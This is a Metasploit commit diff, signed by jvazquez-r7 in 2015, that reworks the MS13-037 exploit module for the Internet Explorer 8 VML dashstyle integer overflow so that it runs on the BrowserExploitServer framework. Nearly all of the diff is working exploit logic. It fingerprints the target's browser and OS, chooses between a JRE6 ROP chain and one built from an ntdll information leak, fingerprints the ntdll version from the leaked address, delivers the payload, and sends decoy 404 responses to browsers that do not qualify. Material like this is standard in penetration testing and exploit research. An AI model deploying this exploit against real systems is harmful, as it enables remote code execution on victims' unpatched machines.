Land rapid7#4652, @wchen-r7's ms13-037 svg exploit update to use BES

jvazquez-r7 · jvazquez-r7 · commit 465b4a5c1b17 · 2015-01-27T13:47:35.000-06:00
diff --git a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
@@ -8,38 +8,37 @@
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::Remote::BrowserExploitServer
   include Msf::Exploit::RopDb
-  #include Msf::Exploit::Remote::BrowserAutopwn
-
-  #autopwn_info({
-  #  :ua_name    => HttpClients::IE,
-  #  :ua_minver  => "8.0",
-  #  :ua_maxver  => "8.0",
-  #  :javascript => true,
-  #  :os_name => OperatingSystems::Match::WINDOWS,
-  #  :rank       => Rank
-  #})
-
 
   def initialize(info={})
     super(update_info(info,
       'Name'           => "MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow",
       'Description'    => %q{
           This module exploits an integer overflow vulnerability on Internet Explorer.
         The vulnerability exists in the handling of the dashstyle.array length for vml
-        shapes on the vgx.dll module. This module has been tested successfully on Windows 7
-        SP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target
-        to use an info leak to disclose the ntdll.dll base address is provided. This target
-        requires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1
-        installation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001).
+        shapes on the vgx.dll module.
+
+          The exploit has been built and tested specifically against Windows 7 SP1 with
+        Internet Explorer 8. It uses either JRE6 or an information leak (to ntdll) to
+        bypass ASLR, and by default the info leak is used. To make sure the leak is
+        successful, the ntdll version should be either v6.1.7601.17514 (the default dll
+        version on a newly installed/unpatched Windows 7 SP1), or ntdll.dll v6.1.7601.17725
+        (installed after apply MS12-001). If the target doesn't have the version the exploit
+        wants, it will refuse to attack by sending a fake 404 message (webpage not found).
+
+          If you wish to try the JRE6 component instead to bypass ASLR, you can set the
+        advanced datastore option to 'JRE6'. If JRE6 is chosen but the target doesn't
+        have this particular component, the exploit will also refuse to attack by
+        sending a 404 message.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
           'Nicolas Joly', # Vulnerability discovery, PoC and analysis
-          '4B5F5F4B', # PoC
-          'juan vazquez' # Metasploit module
+          '4B5F5F4B',     # PoC
+          'juan vazquez', # Metasploit module
+          'sinn3r'        # BES upgrade
         ],
       'References'     =>
         [
@@ -61,23 +60,21 @@ def initialize(info={})
           'InitialAutoRunScript' => 'migrate -f'
         },
       'Platform'       => 'win',
+      'Arch'           => ARCH_X86,
+      'BrowserRequirements' =>
+        {
+          :source => /script/i,
+          :os_name => OperatingSystems::Match::WINDOWS_7,
+          :ua_name => HttpClients::IE,
+          :ua_ver  => '8.0',
+        },
       'Targets'        =>
         [
-          [ 'Automatic', {} ],
-          [ 'IE 8 on Windows 7 SP1 with JRE ROP', # default
-            {
-              'Rop' => :jre,
-              'Offset' => '0x5f4'
-            }
-          ],
-          # requires:
-          # * ntdll.dll v6.1.7601.17514 (fresh W7SP1 installation)
-          # * ntdll.dll v6.1.7601.17725 (MS12-001)
-          [ 'IE 8 on Windows 7 SP1 with ntdll.dll Info Leak',
-            {
-              'Rop' => :ntdll,
-              'Offset' => '0x5f4'
-            }
+          [
+            'IE 8 on Windows 7 SP1',
+              {
+                'Offset' => '0x5f4'
+              }
           ]
         ],
       'Privileged'     => false,
@@ -89,40 +86,20 @@ def initialize(info={})
         OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
       ], self.class)
 
+    register_advanced_options(
+      [
+          # ntdll requires:
+          # * ntdll.dll v6.1.7601.17514 (fresh W7SP1 installation)
+          # * ntdll.dll v6.1.7601.17725 (MS12-001)
+        OptEnum.new('ROP', [true, 'The type of ROP to use (JRE6 or leak NTDLL)', 'NTDLL', ['JRE6', 'NTDLL'] ])
+      ], self.class)
   end
 
   def exploit
-    @second_stage_url = rand_text_alpha(10)
+    @second_stage_url = "#{get_module_resource}#{rand_text_alpha(10)}".chomp
     @leak_param = rand_text_alpha(5)
-    super
-  end
-
-  def get_target(agent)
-    #If the user is already specified by the user, we'll just use that
-    return target if target.name != 'Automatic'
 
-    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
-    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
-
-    ie_name = "IE #{ie}"
-
-    case nt
-    when '5.1'
-      os_name = 'Windows XP SP3'
-    when '6.0'
-      os_name = 'Windows Vista'
-    when '6.1'
-      os_name = 'Windows 7'
-    end
-
-    targets.each do |t|
-      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
-        print_status("Target selected as: #{t.name}")
-        return t
-      end
-    end
-
-    return nil
+    super
   end
 
   def ie_heap_spray(my_target, p)
@@ -204,10 +181,10 @@ def get_ntdll_rop
   def get_payload(t, cli)
     code = payload.encoded
     # No rop. Just return the payload.
-    return code if t['Rop'].nil?
+    return code if t.opts['Rop'].nil?
 
     # Both ROP chains generated by mona.py - See corelan.be
-    case t['Rop']
+    case t.opts['Rop']
     when :jre
       print_status("Using JRE ROP")
       stack_pivot = [
@@ -383,20 +360,32 @@ def html_info_leak
 
   end
 
-  def on_request_uri(cli, request)
-    agent = request.headers['User-Agent']
-    uri   = request.uri
-    print_status("Requesting: #{uri}")
+  def set_rop(t, rop, info)
+    case rop
+    when /^ntdll$/i
+      t.opts['Rop'] = :ntdll
+    when /^jre6$/i
+      if info[:java] !~ /1\.6|6\.0/
+        raise RuntimeError, "Target does not have the suitable Java component (1.6) installed for our attack"
+      end
+
+      t.opts['Rop'] = :jre
+    end
+
+    return t
+  end
 
-    my_target = get_target(agent)
-    # Avoid the attack if no suitable target found
-    if my_target.nil?
-      print_error("Browser not supported, sending 404: #{agent}")
+  def on_request_exploit(cli, request, target_info)
+    begin
+      my_target = set_rop(get_target, datastore['ROP'], target_info)
+    rescue RuntimeError => e
+      # This one is just a warning, because it's a requirement check so it's not that scary.
+      print_warning(e.message)
       send_not_found(cli)
       return
     end
 
-    if my_target['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/
+    if my_target.opts['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/
       html = html_info_leak
       print_status("Sending HTML to info leak...")
       send_response(cli, html, {'Content-Type'=>'text/html'})
@@ -414,7 +403,7 @@ def on_request_uri(cli, request)
         return
       end
 
-      vprint_status("ntdll leak: 0x#{leak.to_s(16)}")
+      print_status("ntdll leak: 0x#{leak.to_s(16)}")
       fingerprint = leak & 0x0000ffff
 
       case fingerprint
@@ -425,7 +414,7 @@ def on_request_uri(cli, request)
         @ntdll_version = "6.1.7601.17725" # MS12-001
         @ntdll_base = leak - 0x47090
       else
-        print_error("ntdll version not detected, sending 404: #{agent}")
+        print_warning("ntdll version not detected, sending 404: #{agent}")
         send_not_found(cli)
         return
       end
